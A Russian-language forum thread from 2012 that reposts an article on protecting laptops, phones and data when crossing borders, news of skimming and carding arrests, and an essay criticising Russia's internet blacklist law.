При работе с облачными файлохранилищами следует помнить о том, что провайдер может находиться в другой стране и подчиняться её законам. Именно поэтому данные в облаке надо шифровать, чтобы там ни говорили рекламные проспекты о безопасности, защищённости и прочих прелестях. Неплохим вариантом может стать использование децентрализованных файловых систем вроде Tahoe-LAFS или же сервисов со встроенным шифрованием данных — к примеру Wuala или SpiderOak (см. обзор). Не менее полезно держать сразу несколько одинаковых копий данных в нескольких местах/сервисах. Помочь в этом деле могут утилиты NCCloud и NubiSave. Параноикам же никто не мешает самостоятельно создать хранилище в облаке, да ещё с удобным веб-интерфейсом и дополнительными функциями. Если вы решили воспользоваться какими-то другими утилитами, то обязательно выбирайте стойкие алгоритмы шифрования. Например, AES или Blowfish с длиной ключа хотя бы в 256 бит.
Выбор пароля или кодовой фразы очень сильно влияет на стойкость любой защиты. В принципе, правила составления надёжного пароля давно известны — случайный набор символов длиной от 10-12 штук, наличие больших и маленьких букв, а также спецсимволов. Некоторые программы успешно принимают даже те знаки, которых нет на клавиатуре, — например, © (Alt+0169). (Использование 1337 — не лучший вариант.) Лучше всего иметь разные пароли для каждого сервиса, аккаунта и так далее. Да, запомнить их будет тяжело, но для этого есть менеджеры паролей, которые требуют запоминания только одного мастер-пароля для доступа ко всем остальным. Работу с веб-аккаунтами заметно облегчает LastPass (вариант с USB-ключом), а для всего остального подойдёт KeePass. Ещё один универсальный менеджер паролей выпускается Symantec — Norton Identity Safe. Он бесплатен, имеет версии для настольных и мобильных ОС, а пароли хранит в облаке.
Отсекай лишнее

Диван, чемодан, саквояж, картину, корзину, картонку и маленькую собачонку… вы вряд ли потащите с собой за границу. Так зачем возить с собой цифровой хлам, покопавшись в котором можно легко найти много чего интересного. А если копнуть чуть глубже, то выяснится, что и удалённые когда-то файлы можно легко восстановить. Поэтому оптимальным вариантом будет использование в ноутбуке, который послужит вам в поездке, отдельного жёсткого диска с девственно чистой, только что установленной ОС и минимальным набором софта. А то и вовсе выделить какой-нибудь дорожный нетбук — его, если что, и потерять не жалко. Надо ли упоминать, что абсолютно всё ПО должно быть лицензионным, на диске не должно быть никаких инсталляторов и уж тем более «лекарств». Также не надо закачивать никаких данных, которые не пригодятся вам в путешествии.

Лучше всего обратиться к облачным технологиям — хранить там файлы и пользоваться онлайновыми редакторами вроде Google Docs. Если же объём информации слишком велик, то опять придётся вернуться к шифрованию. Кстати, если уж до конца заботиться о своей приватности, то стоит вспомнить о том, что потенциальную угрозу представляют почти любые приложения, которые так или иначе имеют доступ к чувствительным данным. Сюда входят и браузеры, и мессенджеры, и FTP-клиенты, и многое другое. Спасением могут стать portable-версии этих самых приложений. Они всё хранят в одной директории, которую можно поместить на защищённый диск/каталог. Экстремалы оценят «портабельный» VirtualBox, внутри которого можно развернуть защищённое окружение и который можно легко уничтожить в любой момент.
Любопытный вариант — это отсылка ноутбука или его диска (флешки с приватными данными) по почте самому же себе в точку пребывания в другой стране. Впрочем, если вы всё же решились использовать облачные хранилища, то вам, быть может, и не нужна вовсе ОС на локальном диске ноутбука, а значит и сам диск. Есть прекрасные защищённые Live-дистрибутивы Linux, которые запускаются с USB-флешки или SD/CD, — Liberté Linux и Tails. Они, правда, гораздо мощнее в плане защищённости. Весь сетевой трафик, например, пускается через анонимную сеть Tor.

Вы тоже можете использовать Tor, но это не самый быстрый вариант относительно безопасного доступа в Сеть, что также бывает очень важно. Альтернативный вариант — собственный или корпоративный VPN-сервер, к которому подключаются все ваши интернет-устройства и выходят в Сеть через него. Недавно появился бесплатный и не требующий особых знаний VPN-сервис Comodo TrustConnect. Вкупе c DNSCrypt (увы, пока есть только Mac-клиент) он поможет создать более-менее защищённый интернет-канал. Впрочем, тут остро встаёт вопрос доверия тем или иным сервисам, но это и так касается всего и вся в этом мире.
После того как вы закончили работу на ПК, надо вычистить всё лишнее — временные файлы, логи, cookies и так далее. Для Windows подойдёт утилита CCLeaner, которая, помимо всего прочего, умеет «вычищать» свободное место на жёстком диске, фактически затирая те данные, что там когда-то были. Это затруднит обнаружение удалённых файлов, но сам процесс очистки может затянуться надолго, особенно на дисках большого объёма. В этом плане гораздо удобнее мелкие SSD-накопители — после удаления файлов достаточно выполнить команду TRIM, чтобы резко снизить шанс их восстановления в будущем. Правда, надо изучить особенности контроллера и его прошивки, так как не все они сразу же очищают блоки — некоторые только помечают их для дальнейшей очистки. Перед пересечением границы рекомендуется выполнить подобную очистку, разлогиниться из всех веб-аккаунтов и приложений, а также обязательно выключить ноутбук, смартфон и прочую электронику. Для полного уничтожения информации на HDD воспользуйтесь пакетом DBAN или Nwipe.

Дела мобильные

Хорошо, с ноутбуком вроде разобрались. А что насчёт других устройств? У вас ведь наверняка с собой будет смартфон, фото- или видеокамера, плеер или какое-то другое электронное устройство. Для USB-флешек и карт памяти лучше всего произвести низкоуровневое форматирование перед поездкой и избегать хранения на них незашифрованной конфиденциальной информации. Для смартфонов в общих чертах действуют те же правила, что и для ноутбуков. Идеальный вариант — какой-нибудь недорогой аппарат на время поездки. Лучше всего настроить его уже после пересечения границы, так как подавляющее большинство современных смартфонов позволяет синхронизировать с облаком как минимум телефонную книгу. Если вы хотите сохранить свой домашний номер, то прочтите материал о настройке связки с SIP.
Некоторые мобильные ОС предоставляют расширенные настройки безопасности. Например, удалённый сброс до заводских настроек в случае утери аппарата. Все они позволяют задать пароль для разблокировки, чем непременно стоит воспользоваться. Также с помощью стороннего или встроенного ПО можно зашифровать внутреннее хранилище и/или карту памяти. Эталоном в этом смысле является продукция Blackberry. Для защиты Android подойдут утилиты из набора WhisperCore. Ну и не забывайте про VPN-туннель (см. выше), особенно при использовании общественных точек доступа.

Говори, но не заговаривайся

Представители власти на границе, как правило, имеют довольно широкие полномочия для обыска. Поэтому никогда не оказывайте им сопротивление, никогда не лгите и честно отвечайте на все вопросы, ни за что не пытайтесь во время обыска удалить какие-либо данные. Во многих странах все эти действия являются уголовно наказуемыми преступлениями. Обязательно изучите законодательство страны, куда вы въезжаете, и по возможности проконсультируйтесь со специалистами, как вести себя в той или иной ситуации. Электронные устройства могут изъять на некоторое время для изучения, но отбирать насовсем вряд ли станут. Очень тонкий момент — предоставление доступа к зашифрованным конфиденциальным данным. Чаще всего для этого нужно решение суда, но, чтобы избежать таких неловких ситуаций, можно сделать небольшой финт. Например, создать на ноутбуке две учётные записи — одну для лично-развлекательных нужд, а вторую, зашифрованную, для работы. Или же иметь два накопителя, тома, контейнера — с защитой и без. При этом пароля для доступа к защищённым данным у вас быть не должно — его должна передать вам служба безопасности или просто друг/родственник после пересечения границы. Наконец, самое простое и эффективное правило для избегания проблем — будьте вежливы во время общения. Если же что-то пошло не так и вы резонно считаете, что были нарушены ваши права или закон, то не стесняйтесь писать жалобы или подавать иски.

Заключение

Итак, ещё раз вкратце пробежимся по основным тезисам. Во-первых, ставим пароли на всё и вся, а также шифруем все важные данные, для которых регулярно делаем резервные копии. Во-вторых, не берём с собой в поездку ненужную информацию и электронные устройства. В-третьих, надёжно удаляем данные, которые уже не нужны, и не забываем выключать все устройства. В-четвёртых, заботимся о безопасности выхода в Сеть и продумываем ваши действия на случай утери устройств и важной информации. В-пятых, внимательно изучаем законы страны въезда и в соответствии с ними ведём себя при пересечении границы. Ну и самое очевидное — всегда используйте наиболее свежие версии ОС и приложений, устанавливайте обновления, не забывайте про антивирус + брандмауэр и прочие средства базовой защиты системы. Это, в общем, минимальный набор советов. Помните, что 100%-й безопасности и защищённости невозможно достичь в принципе, тем более что традиции терморектального криптоанализа кое-где до сих пор живы. Тем не менее хоть немного успокоить паранойю приведенные нами методы смогут, однако здравый смысл никогда не стоит терять. Удачных вам путешествий и деловых поездок!

SAWWA
16.05.2012, 15:31
В Белгороде осуждены скиммеры
15 мая 2012 12:33

Членам преступной группировки было предъявлено обвинение в совершении восемнадцати преступлений. До вынесения судом обвинительного приговора подсудимые находились под стражей. Суд приговорил одного преступника к пяти с половиной годам, а второго к трем годам лишения свободы с отбыванием наказания в колонии общего режима.

В июле прошлого года белгородские полицейские пресекли деятельность организованной преступной группы, состоящей из граждан Республики Молдова, которые на территории Белгородской области с помощью специального оборудования снимали денежные средства со счетов клиентов банков.

Для получения нужной информации о владельце карты и пин-коде преступники использовали специальные устройства – скиммеры, с помощью которых мошенники получали информацию, записанную на магнитной полосе банковской карты.

В течение двух дней преступники смогли овладеть данными счетов более чем восьми сотен белгородцев. Общая сумма, хранившаяся в банках денежных средств, составила около семнадцати миллионов рублей. Однако похитить эту сумму злоумышленникам не удалось благодаря сотрудникам полиции. Подозреваемых задержали и в отношении них было возбуждено уголовное дело.

В ходе расследования была установлена причастность задержанных к совершению аналогичных преступлений. Два года назад с двух пластиковых карт белгородцев они незаконно сняли двадцать четыре с половиной тысячи рублей.

Для того, чтобы уберечь себя от риска достаточно просто прикрыть клавиатуру рукой при наборе кода, а сам пин-код хранить в памяти, а не вместе с банковской картой.

Пресс-служба УМВД России по Белгородской области
http://www.mvd.ru/news/show_105912/

SAWWA
31.05.2012, 23:16
В России из банкоматов Сбербанка украли 24 миллиона рублей
Lenta.ru

В Приморском крае возбуждено дело о хищении у Сбербанка 24 миллионов российских рублей. В этом преступлении подозреваются злоумышленники, которые обманывали банкоматы, сообщает Генпрокуратура РФ.

С заявлением о краже денежных средств в правоохранительные органы обратился руководитель Дальневосточного банка Сбербанка. Хищения происходили в 2010 году.

В ходе расследования выяснилось, что некие злоумышленники проводили "определенные манипуляции с банкоматами". В результате они получали наличные по банковской карте, но при этом лимит средств на ней оставался прежним.

Расследование уголовного дела проводится по статье "кража". Оно находится под контролем краевой прокуратуры.

SAWWA
17.06.2012, 15:32
Lenta.ru

Франция выдала США российского хакера

Франция экстрадировала в США Владислава Хорохорина, известного также как BadB. Как сообщается на сайте Департамента юстиции США, 6 июня он прибыл в Америку. 7 июня Хорохорин предстал перед судьей в Вашингтоне, который постановил оставить его под стражей до начала процесса.

27-летний Хорохорин, имеющий гражданство Украины, Израиля и России, подозревается в махинациях с кредитными картами. По данным следствия, он продавал в интернете украденные данные о картах "в большом количестве", в том числе на форумах "CarderPlanet" и "carder.su". Хорохорин был одним из организаторов преступной схемы, которая позволила снять более девяти миллионов долларов в 2100 банкоматах 280 городах по всему миру менее чем за 12 часов, отмечается в сообщении Департамента юстиции.

Помощник генпрокурора США Лэнни Брюер (Lanny A. Breuer) назвал Хорохорина "одним из наиболее известных во всем мире мошенников, занимающихся кредитными картами".

В ноябре 2009 году федеральный судья округа Колумбия заочно предъявил Хорохорину обвинения в мошенничестве и краже с отягчающими обстоятельствами. Помимо этого, в августе 2010 года федеральный суд северного округа штата Джорджия обвинил его в заговоре с целью совершить киберпреступление и мошенничестве с использованием средств связи.

Хорохорин был задержан во Франции в августе 2010 года, когда он пытался вылететь в Москву. В том случае, если он будет признан виновным по всем пунктам, ему грозит 62 года тюрьмы.

SAWWA
26.06.2012, 01:29
Японцы взломали сверхстойкий шифр

http://www.nestor.minsk.by/kg/


Эксперты японской компании Fujitsu смогли взломать новый криптографический стандарт pairing-based cryptography. По информации Fujitsu, на полный анализ 923-битного парного криптоключа ушло в общей сложности 148 дней.

Помог нестандартный подход: ранее, при использовании стандартных механизмов, на выполнение такого рода дешифровки потребовалось бы несколько сотен тысяч лет.

Для взлома криптоключа эксперты Fujitsu использовали локальную сеть, состоящую из 21 компьютера с общим количеством ядер 252 штуки. Применение новых софтверных технологий позволило проделать требуемые операции в несколько тысяч раз скорее, чем они выполнялись бы с использованием стандартных алгоритмов дешифровки.

"Приемы криптоанализа становятся все более продвинутыми, а сам процесс криптоанализа постоянно ускоряется, тогда как стойкость алгоритмов защиты, напротив, снижается. В свете этого очень важно оценивать, как долго криптоалгоритмы могут защищать информацию", – говорится в пресс-релизе Fujitsu.

Новая методика "вскрытия" алгоритмов защиты стала результатом исследования, проведенного исследовательским центром Fujitsu совместно со специалистами из японского Национального института информационных и коммуникационных технологий и Университета Кюсю.

SAWWA
21.07.2012, 01:57
http://www.mvd.ru/news/show_110364/

В Твери задержан мошенник, который при помощи компьютерных технологий считывал информацию с банковских карт граждан
18 июля 2012 17:04
В Центральный отдел полиции УМВД России по Тверской области поступило сообщение от сотрудника службы безопасности тверского отделения банка о том, что на одном из банкоматов, расположенном на проспекте Победы, установлено нештатное оборудование.
В ходе проведения оперативно-разыскных мероприятий сотрудниками полиции была установлена личность злоумышленника. Им оказался 22-летний житель Московской области, ранее судимый за мошенничество.
В машине молодого человека сотрудники полиции обнаружили и изъяли прибор для считывания информации с банковских карт, портативную видеокамеру и другие приспособления, используемые злоумышленником для осуществления своего преступного замысла. При обыске у жителя Подмосковья также были обнаружены ноутбук с необходимым программным обеспечением и 23 пластиковые модели для изготовления банковских карт. Все это позволило бы ему в дальнейшем присвоить деньги держателей банковских карт.
В настоящее время по данному факту возбуждено уголовное дело по ст. 272 УК РФ «Неправомерный доступ к компьютерной информации». Гражданин, подозреваемый в совершении данного преступления, задержан в порядке статьи 91 УПК РФ.

Пресс-служба УМВД России по Тверской области

_________________________

http://www.mvd.ru/news/show_110021/
Пресечена деятельность группы, причастной к хищениям денег в сети Интернет
13 июля 2012 12:24
Сотрудниками отдела «К» УМВД России по Ярославской области пресечена деятельность группы лиц, причастных к хищениям денежных средств в сети Интернет.
Начиная с февраля 2011 года, сотрудниками отдела «К» УМВД России по Ярославской области проводилась оперативная разработка группы лиц, проживающих на территории области и причастных к хищениям денежных средств путем неправомерного доступа к различным информационным системам: «WebMoney», «Яндекс.Деньги», «Yota», «Qiwi», программам «Клиент-банк», систем мгновенных межбанковских переводов денежных средств.
В ходе проведенного комплекса оперативно-разыскных мероприятий установлены участники указанной преступной группы. Один из членов группы находился в федеральном розыске за совершение аналогичного преступления на территории другого субъекта Российской Федерации.
С сентября 2011 года он переехал в г. Санкт-Петербург с целью постоянного проживания. В январе 2012 года второй участник указанной группы также переехал в г. Санкт-Петербург.
В феврале 2012 года в УМВД России по Ярославской области были возбуждены уголовные дела по ч. 3 ст. 159, ст. 272, ст. 273 УК РФ в отношении неустановленных лиц по фактам хищения денежных средств с расчетных счетов банков в крупном размере путем неправомерного доступа к компьютерной информации. Ущерб составил около 2 миллионов рублей.
В ходе оперативного сопровождения указанных уголовных дел сотрудниками отдела «К» УМВД России по Ярославской области совершен выезд в г. Санкт-Петербург. Совместно с сотрудниками ГУ МВД России по г. Санкт-Петербургу и Ленинградской области организованы и проведены оперативно-разыскные мероприятия, направленные на установление фактических мест жительства фигурантов.
Адреса проживания фигурантов были установлены и, при силовой поддержке СОБР УМВД России по Ярославской области, сотрудниками полиции по указанным адресам одновременно были проведены обыски. В это же время сотрудниками отдела «К» УМВД России по Ярославской области проведены обыски у остальных участников преступной группы, проживающих в г. Ярославле и г. Угличе Ярославской области.
В ходе обысков изъята компьютерная техника, носители информации, мобильные телефоны, сим-карты операторов сотовой связи, пластиковые банковские карты в больших количествах, распечатки платежных поручений, договора на открытие банковских счетов третьими лицами, генеральные доверенности. После проведения обысков участники преступной группы были задержаны. Троим из них избрана мера пресечения - заключение под стражу.
В настоящее время проводится оперативное сопровождения данных уголовных дел с целью установления дополнительных эпизодов преступной деятельности группы.
Пресс-служба УМВД России по Ярославской области

SAWWA
22.07.2012, 02:14
Глава Агентства национальной безопасности США Кит Александер намерен принять участие в хакерской конференции Defcon в Лас-Вегасе с 24 по 27 июля 2012 г. Один из организаторов мероприятия Джефф Мосс рассказал: «Мы покажем ему конференцию, он хочет побродить там» .
Мосс работает в ICANN руководителем отдела безопасности, он консультант Минобороны США и известен среди хакеров как The Dark Tangent.
Кит Александер планирует выступить перед участниками Defcon. Организаторы ожидают неоднозначной реакции со стороны хакеров.
http://www.reuters.com/article/2012/07/21/net-us-usa-security-hackers-idUSBRE86K01U20120721

SAWWA
25.07.2012, 02:41
СУЩЕСТВУЕТ ТАКАЯ ТОЧКА ЗРЕНИЯ
прочитав подробно данный материал сразу приходит на ум радио Свобода, ясно из каких источников финансируемая и с какими целями "работающая"

главное - загребать жар чужими руками..

http://www.3dnews.ru/

Автор: Бёрд Киви
http://www.3dnews.ru/offsyanka/632737/
Дата: 25.07.2012
Новоиспеченный российский закон, вводящий для Интернета черные списки (или Hеестр сайтов с запрещенным контентом), вызывает естественные вопросы. Слишком уж много признаков, что декларируется тут одно, а подразумевается нечто существенно иное
Перед уходом на летние каникулы в парламенте решили вдруг озаботиться защитой молодежи от тлетворного влияния Интернета. И стахановскими темпами придумали-приняли новый закон — о внесении изменений в (другой, еще даже не начавший действовать) федеральный закон «О защите детей от информации, причиняющей вред их здоровью и развитию». Суть внесенных поправок, как все уже знают, сводится к созданию так называемых черных списков, на основании которых по всему государству будет блокироваться интернет-доступ к сайтам с противоправным и вредным контентом. К таковому отнесены детская порнография, пропаганда наркотиков и суицида.
27261
Eсли рассуждать абстрактно, то что, казалось бы, в этом плохого? Кто, находясь в здравом уме, будет выступать против борьбы с такой мерзостью, как растление малолетних? Да и по прочим пунктам: всякие нормальные родители, наверное, будут только рады, если государство поможет им оградить своих чад от таких жутких напастей, как наркомания и самоубийство. Проблема в том, что абстрактные рассуждения не годятся для анализа текущей жизни в конкретном государстве. И если в этой стране значительная часть интернет-сообщества, способная внятно и без мата формулировать свою позицию, совершенно определенно выступает против нового закона, то тому должны быть действительно серьезные причины.
Все, кто интересуется данной историей, наверняка уже не раз читали и слышали многочисленные доводы противников черных списков. Доводы о том, в частности, что российское законодательство и так имеет вполне достаточно статей, позволяющих строго наказывать за преступления, связанные с растлением малолетних или наркобизнесом. Что введение цензуры нигде и никогда не делало общество лучше. Что в технических аспектах предлагаемые законом меры по блокированию запрещенных сайтов на деле эффективно не реализуются, а значит и закон работать не будет...
Примечательно, что одним из самых сильных контрдоводов, привлекаемых сторонниками нового закона в его защиту, стала формула «все так делают». Иначе говоря, к чему все эти бесплодные споры, если систематической фильтрацией интернет-контента ныне занимаются уже чуть ли не все государства. Не только авторитарные режимы в регионах Азии и Персидского залива, но также вполне демократические власти и в Европе (вроде Британии, Германии, Италии, Франции, стран Скандинавии), и в Австралии, и в Канаде, и в Южной Америке. То есть, можно сказать, Россия тут просто подтягивается к всеобщей мировой тенденции.
В общем, ясно, наверное, что проблема здесь обозначилась непростая. И для лучшего ее понимания хотелось бы иметь какой-нибудь еще аналитический инструмент, позволяющий выявлять дополнительные и/или скрытые аспекты происходящего. Среди нестандартных подходов к анализу можно выбрать, к примеру, вот такой.
Теория информации и криптография
Одной из любопытных особенностей в истории развития прикладной математики XX века стало то, что теория информации и теория криптографии родились практически одновременно. Более того, родителем обеих наук является один и тот же человек — Клод Элвуд Шеннон. Иначе говоря, имеются все — даже чисто медицинские — основания называть эту пару науками-близнецами, описывающими в общем-то одно и то же, но только с несколько разных сторон. Если теория информации занимается тем, каким образом в целостности и без искажений передавать сообщение по каналу, сильно зашумленному помехами, то криптография решает задачу, формулируемую с точностью до наоборот. А именно: каким образом следует искажать сигнал искусственным шумом до такой степени, чтобы противник, подключившийся к каналу передачи, не смог бы понять содержание сообщения.
Особенно интересным разделом криптографии является криптоанализ — то есть специальный набор математических процедур и приемов для вскрытия шифров (ибо нельзя сконструировать сильный криптоалгоритм, не научившись прежде вскрывать шифры слабые). Понятно, что суть работы криптоаналитика — это получение доступа к сигналу, несмотря на все усилия тех, кто его «зашумлял». То есть можно говорить, что криптоанализ решает ту же самую задачу, что и теория информации, но только в условиях более специфического «шума в канале».

Но какое отношение вся эта история имеет к принятому ныне в России закону о черных списках для Интернета? Связь тут следующая: стандартный набор процедур, применяемых криптоаналитиками при вскрытии шифров, и в этом случае позволяет «отделить сигнал от шума», обеспечивая таким образом доступ к содержанию данного послания в его исходном, очищенном от помех виде. В криптографии такой сигнал называют «открытым текстом». Конечно же, здесь это «дешифрование» будет проделано без той математической строгости, что присуща современной криптоаналитической науке. Криптография, можно сказать, в данном случае привлекается скорее в качестве наглядной метафоры.

Статистические аномалии

Одним из главных внешних признаков качественного криптоалгоритма обычно является статистически ровный шифртекст, похожий на случайную равновероятную последовательность. Всякая же статистическая аномалия в появлении символов и их комбинаций, как правило, указывает на имеющуюся в шифре слабость. Такого рода слабости, ведущие к легкому вскрытию защиты, были характерны, например, для криптографии в первых версиях ОС Windows.

Применительно к потоку законотворчества нашей Госдумы статистическая аномалия резко обозначилась в июле, когда в течение всего одной недели без каких-либо предварительных обсуждений были внесены, заслушаны и приняты сразу три закона. Причем все три — о клевете, об общественных организациях как «иностранных агентах», о черных списках для вредных интернет-сайтов — характеризуются одной и той же, собственно, особенностью. Все эти инициативы направлены на ограничение имевшихся прежде прав, вводя дополнительную ответственность для всех, кто так или иначе зависит от власти. Говоря подоходчивее, никаких дополнительных свобод эти законы не подразумевают. Речь там идет лишь о новых запретах и о наказаниях за «непослушание».

Если же вспомнить, что чуть ранее, в июне, был принят и весьма созвучный этим трем новый закон об ограничении свободы собраний, то без всяких статистических расчетов становится вполне очевидно: власти в России заметно встревожены процессами, идущими в обществе, а потому начали поспешно закручивать гайки.
Частые повторения
Перейдем к более конкретному рассмотрению нового закона о черных списках для блокирования запрещенных интернет-сайтов. Тут полезно обратиться к специфическому криптоаналитическому приему под названием «выявление повторений». Статистически неслучайные повторения в тексте послания нередко дают весьма мощный рычаг для взлома криптосистемы. Особенно в тех случаях, когда повторения одного и того же вида встречаются часто и именуются техническим термином «стандарты переписки» (любителям историй про Шерлока Холмса для иллюстрации метода можно напомнить сюжет о взломе им шифра пляшущих человечков). В анализируемом нами случае один из стандартов подобного рода очень хорошо известен заранее и выглядит как «детская порнография».
Законодатели практически всех стран мира каждый раз, когда надо протащить какой-нибудь очередной заведомо непопулярный в обществе закон, снова урезающий гражданские права и свободы, первым делом норовят привлечь в качестве неотразимого аргумента борьбу с детской порнографией и чертовыми педофилами. До недавнего времени столь же безотказно работала нескончаемая война с угрозами терроризма, однако благодаря чрезмерной активности США на данном поприще и абсолютно невыразительным итогам этой борьбы на фоне общей усталости масс, террористическую угрозу ныне перевели в разряд горячего резерва. Короче говоря, аргумент борьбы с «детской порнографией» пока что работает действительно безотказно, а потому привлекается вновь и вновь. В том числе — и для беспощадной войны с плохими веб-сайтами. Длится вся эта борьба уже многие годы, но при этом, что характерно, количество историй о растлении малолетних ничуть не уменьшается.
На очень выразительных примерах из истории секс-скандалов в католической церкви и в высшем политическом руководстве целого ряда стран хорошо известно, что преступления, связанные с растлением малолетних, регулярно и в массовых масштабах замалчиваются — дабы не порочить авторитет власти и духовенства. Как следствие, идеи борьбы с педофилами и собственно педофилы существуют как бы сами по себе, пересекаясь лишь в отдельных эпизодических случаях, когда заметают лишь каких-нибудь совсем уж незначительных извращенцев.
Многократное использование одного ключа
Криптографической теорией и практикой установлено, что даже в тех случаях, когда для засекречивания сообщений используются весьма сильные шифры, обеспечивающие в канале сигнал, статистически никак не отличимый от случайной равновероятной последовательности, все равно имеется реальная возможность вскрытия защиты — если по какой-то причине отправитель для разных посланий использовал один и тот же секретный ключ. Обращаясь к историческим примерам, наглядно иллюстрирующим данную слабость, можно вспомнить знаменитую историю взлома англичанами германского шифратора «Шлюссельцузатц», закрывавшего особо секретную переписку высшего руководства Третьего рейха. Из-за всего одной, но очень серьезной ошибки немецкого шифровальщика, повторно применившего тот же самый ключ, британские криптоаналитики сумели восстановить по шифртекстам всю схему работы шифратора. После чего построили сначала один, а затем и десять «суперкомпьютеров» Colossus, несколько лет обеспечивавших постоянное чтение немецких секретов вплоть до победы над нацизмом.
Применительно к той борьбе, которую нынешние власти демократических и не очень стран ведут в Интернете с собственными гражданами, пытаясь перекрыть им доступ к сайтам с запрещенным контентом, роль важнейшего элемента системы — или «ключа» — играют так называемые черные списки, содержащие конкретные адреса подлежащих блокированию сайтов. Понятно, что вся эта система хоть как-то способна обозначать свою работоспособность исключительно в условиях сохранения подобных черных списков в строжайшем секрете. Но понятно также и то, что подобные списки невозможно применять однократно — напротив, они действуют постоянно, время от времени лишь пополняясь новыми строчками запретов. Отсюда-то проистекает и их ключевая слабость.
Как показывает опыт, рано или поздно непременно происходит утечка черного списка в Интернет, обычно через сайты компромата типа WikiLeaks. И тут же любому становится видно, что все эти разговоры про борьбу с детской порнографией и педофилами — просто повод для установления негласного и внесудебного контроля за доступом к информационным интернет-ресурсам. Так было практически всюду, где черные списки сливались в Сеть противниками цензуры. В Таиланде, скажем, где, как и всюду, обосновали сетевую цензуру необходимостью борьбы с детской порнографией, на самом деле свыше 1000 запрещенных сайтов были связаны с критикой правящей королевской семьи. В Австралии лишь треть позиций секретного реестра относилась к запрещенным порносайтам. В Финляндии среди очень далеких от детской порнографии, но все равно запрещенных ресурсов обнаружились сайты, критикующие антидемократическую практику цензуры.
Открытый текст
Завершая данные упражнения в криптоанализе законотворческих посланий и отделив маскирующий шум от действительно содержательной информации, мы можем сделать следующий вывод. И в российском, и в международном законодательстве без всяких черных списков давно существует вполне достаточный набор правовых инструментов, позволяющих пресекать и строго наказывать преступления, связанные с растлением малолетних и детской порнографией.

Конкретно в условиях физического расположения сайтов на территории России госвласти имеют и вполне успешно применяют широчайший набор различных методов для блокирования любых интернет-ресурсов, расцениваемых ими как вредные. Закрытие сайтов может происходить как по решению судов, так и во внесудебном порядке: по представлениям прокуратуры, МВД или Минсвязи, через лишение доменного имени в зоне .RU и/или через физическую конфискацию серверов. То есть фактически вся эта созданная новым законом система — с блокированием адресов через механизмы черных списков — для сайтов на российской территории и не требуется вовсе. Для чего же она может реально пригодиться, так это для быстрого и беспроблемного блокирования любого неугодного властям инфоресурса, находящегося за рубежом. Будь это хоть «Живой журнал», хоть YouTube, хоть сам Google.
Не факт, конечно, что такая потенциальная возможность будет часто применяться, однако собственно механизм цензуры для этого создан. Причем создано все это в очевидном противоречии с российской Конституцией, где в статье 29, пункт 5, в дословном виде прописана следующая строка: «Гарантируется свобода массовой информации. Цензура запрещается»...
Информация без смысла
Одна из важнейших особенностей теории информации (как и криптографии) заключается в том, что наука оперирует исключительно информационными битами, никак не интересуясь смысловым содержанием этих битов. Все, что касается смысла информации, относится уже не к математическо-аналитической части, а к тому, кто именно этой информацией пользуется и ее интерпретирует. Наглядной иллюстрацией этой особенности может служить информация о результатах скачек на ипподроме. Для кого-то набор символов с именем победителя может стать новостью о неожиданном получении целого состояния. Для кого-то еще — трагическим известием о крушении последних надежд. Ну а для подавляющей массы населения тот же самый фрагмент информации пройдет, скорее всего, абсолютно незамеченным — как будто его и не было вовсе.

Информация о повсеместных попытках насаждения внесудебного блокирования контента в Интернете, что осуществляется вопреки духу и букве всех конституций свободного мира, запрещающих цензуру, относится к той же самой категории. Для кого-то это явный сигнал тревоги, требующий немедленного вмешательства для восстановления утрачиваемых гражданских прав и свобод. Для других — это благая весть, означающая, что власти всех стран — вне зависимости от идеологии и религии — наконец-то вполне единодушны в своем желании иметь инструменты для эффективного контроля за информацией, доступной их гражданам. Ну а для очень значительной массы населения эта новость вообще не означает практически ничего. Им, так сказать, все эти цензуры-несвободы в общем-то до лампады.
А теория информации и криптография тут совершенно не при чем.
Для тех, кто интересуется теорией и практикой криптоанализа, базовые приемы взлома простейших шифров популярно и общедоступно описаны в классической работе Эдгара Алана По «Золотой жук». Тем, кто предпочитает более современное и наукообразное изложение, можно посоветовать учебное пособие по основам криптоанализа (к сожалению, только на английском языке) Basic Cryptanalysis.

http://www.3dnews.ru/offsyanka/632737/

SAWWA
28.07.2012, 03:35
Есть такой полезный ресурс http://sms.kaspersky.ru , где можно самостоятельно попытаться разблокировать компьютер когда он внезапно попросит денег


да и к рекомендациям Мегафона неплохо прислушаться

27263

SAWWA
31.07.2012, 00:29
Иногда сложные пароли помогут избежать большого наказания...
http://bezpekaua.com/informacionnaya-bezopasnost/zashhita-informacii/1030-slozhnye-paroli-na-kompyutere-mozhesh-popast-v-tyurmu.html

Гражданин Великобритании осужден на четыре месяца колонии за то, что не раскрыл полиции пароль к закодированным файлам на своем компьютере.

19-летний Оливер Дрейг из Фреклтона, графство Ланкашир, был арестован в мае 2010 года в рамках расследования дела о распространении детской порнографии. Его компьютер изъяла полиция, однако она не смогли получить доступ к нужным материалам из-за их надежной криптографической защиты, выполненной применением с 50-символьного пароля.

Полиция официально запросила пароль у Дрейга, однако он отказался сотрудничать, что является нарушением закона Великобритании о регулировании полномочий следствия (Regulation of Investigatory Powers Act). В результате Королевский суд Престона приговорил Дрейга к 16 неделям пребывания в колонии для молодых преступников. Полиция же до сих пор пытается взломать пароль на компьютере Дрейга.

«Решение о тюремном заключении демонстрирует, как серьезно суд относится к нарушению данного закона», — прокомментировал ситуацию для Press Association представитель полиции Нейл Фоулер. По его словам, примененный обвинением закон был специально разработан для противодействия использованию интернета в преступных целях.

На сегодняшний день это всего второй случай вынесения приговора о тюремном заключении по закону о регулировании полномочий следствия. Ранее 33-летний лондонец несколько раз отказывался раскрыть антитеррористической полиции пароли к закодированным файлам на своем компьютере, которые, по его словам, содержали конфиденциальную информацию, связанную с его работой. В сентябре 2008 года его арестовала полиция, а в июне 2009 года он получил девять месяцев тюрьмы. В процессе отбывания срока осужденный попал в психиатрическую клинику...




на самом деле не верится, что в системах шифрования нет "закладок".. или просто спецслужбы не добрались до разработчиков программного обеспечения для небольшого разговора по душам.. как правило тиски и сварочный аппарат или паяльник помогут найти любой код.

категорически поддерживаю всевозможные системы кодирования и запароливания личных данных.

SAWWA
31.07.2012, 00:34
Ради чего хакер может попытаться атаковать ваш компьютер?
1. Ради удовольствия. Некоторые люди просто развлекаются, изучая содержимое чужого компьютера и по мере сил его совершенствуя: например, добавляя нецензурные слова в чужие документы. Приятно также блокировать работу чужого компьютера и наблюдать, как дергается, поминутно перезагружаясь, его владелец.
2. Ради похищения вашего пароля dial-up-доступа в Интернет (чтобы потом ходить по Сети за ваш счет).
